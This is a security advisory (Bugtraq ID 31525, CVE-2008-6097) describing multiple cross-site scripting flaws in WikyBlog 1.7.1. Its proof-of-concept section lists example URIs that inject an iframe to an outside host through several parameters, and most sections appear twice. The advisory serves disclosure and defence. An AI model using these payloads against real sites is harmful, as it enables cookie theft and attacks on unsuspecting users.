WikyBlog Multiple Cross-Site Scripting Vulnerabilities
BID:31525
Info
WikyBlog Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 31525 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6097 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 01 2008 12:00AM |
| Updated: | May 07 2015 05:22PM |
| Credit: | Omer Singer |
| Vulnerable: |
WikyBlog WikyBlog 1.7.1 |
| Not Vulnerable: | |
Discussion
WikyBlog Multiple Cross-Site Scripting Vulnerabilities
WikyBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WikyBlog 1.7.1 is vulnerable; other versions may also be affected.
WikyBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WikyBlog 1.7.1 is vulnerable; other versions may also be affected.
Exploit / POC
WikyBlog Multiple Cross-Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting to victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php/Special/Main/keywordSearch?key="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/WhatLinksHere?to="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/UserEdits?user="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe>
Attackers can exploit these issues by enticing an unsuspecting to victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php/Special/Main/keywordSearch?key="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/WhatLinksHere?to="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/Special/Main/UserEdits?user="><iframe src="http://www.example2.com"></iframe>
http://www.example.com/index.php/"><iframe src="http://www.example2.com"></iframe>
Solution / Fix
WikyBlog Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
WikyBlog Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- WikyBlog Homepage (WikyBlog)
- WikyBlog Mulitple Cross-Site Scripting Vulnerabilities (Omer Singer)